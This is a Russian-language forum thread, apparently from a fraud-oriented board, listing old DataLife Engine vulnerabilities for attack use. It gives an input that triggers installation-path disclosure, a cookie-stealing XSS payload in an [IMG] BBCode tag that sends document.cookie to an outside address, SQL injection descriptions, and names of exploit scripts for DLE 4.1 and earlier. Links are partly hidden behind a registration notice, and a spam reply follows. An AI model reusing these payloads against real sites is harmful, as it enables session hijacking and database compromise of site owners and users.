Залив на карту
  1. Внимание дорогие участники форума. Если увидите на форуме мошенника, спам, реклама, обман, оскорбления, любой развод и тем более все что связано с наркотическими веществами. . Если заметите что-либо подобное просьба отписаться администрации форума. Либо нажимайте кнопку пожаловаться. И я сразу отреагирую. Тем и сообщений много все не уследишь.С вашей помощью наведем порядок.

Уязвимость /datalife Engine/

Тема в разделе "Обзор уязвимостей DataLife Engine", создана пользователем Kven, 4 мар 2018.

  1. Kven

    Kven Guest

    Обзор уязвимостей [DataLife Engine]


    Сайт производителя: Ссылки могут видеть только зарегистрированные пользователи. Зарегистрируйтесь или авторизуйтесь для просмотра ссылок!
    Актуальная версия: 8.5

    DataLife Engine v.3.7


    [Раскрытие установочного пути]

    В parse.class.php выделено 12582912 байт на проверку сообщения.
    Переполнение делается так: "<<><><><><><>>"

    [ХСС]

    Угнать кукисы можно при помощи вставки картинки.
    -- этим можно воспользваться всегда, даже если нету таких кнопок при
    добавлении новости, личном сообщении, добавления коментария.
    Непосредственно сама ХСС:

    Code:
    [IMG=left]Ссылки могут видеть только зарегистрированные пользователи. Зарегистрируйтесь или авторизуйтесь для просмотра ссылок!" onmouseover='document.location=" class="fixed">Ссылки могут видеть только зарегистрированные пользователи. Зарегистрируйтесь или авторизуйтесь для просмотра ссылок!"+document.
    cookie;'><!--[/IMG]
    [Проблемы с SQL]

    Code:
    Ссылки могут видеть только зарегистрированные пользователи. Зарегистрируйтесь или авторизуйтесь для просмотра ссылок! -- где topic -- это не существующая тема.
    Результат: SELECT id FROM nws_category WHERE parentid=not detected ;

    Версия 4.1 возможно более ранние SQL Injection.


    Описание:
    Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения.

    Уязвимость существует из-за недостаточной обработки входных данных в параметре "user" в сценарии index.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения. Пример:

    Code:
    Ссылки могут видеть только зарегистрированные пользователи. Зарегистрируйтесь или авторизуйтесь для просмотра ссылок!
    Код:
    DataLife Engine <= 4.1 Remote SQL Injection Exploit (perl)
    DataLife Engine <= 4.1 Remote SQL Injection Exploit (php)
    SQL injection for <=4.1 version exploit
    RGdatalife - exploit (php version)
     
  2. VincentGom

    VincentGom Участник
    Участник

    Регистрация:
    19 апр 2019
    Сообщения:
    2
    Симпатии:
    0
    I congratulate, what words..., a brilliant idea
     
Залив на карту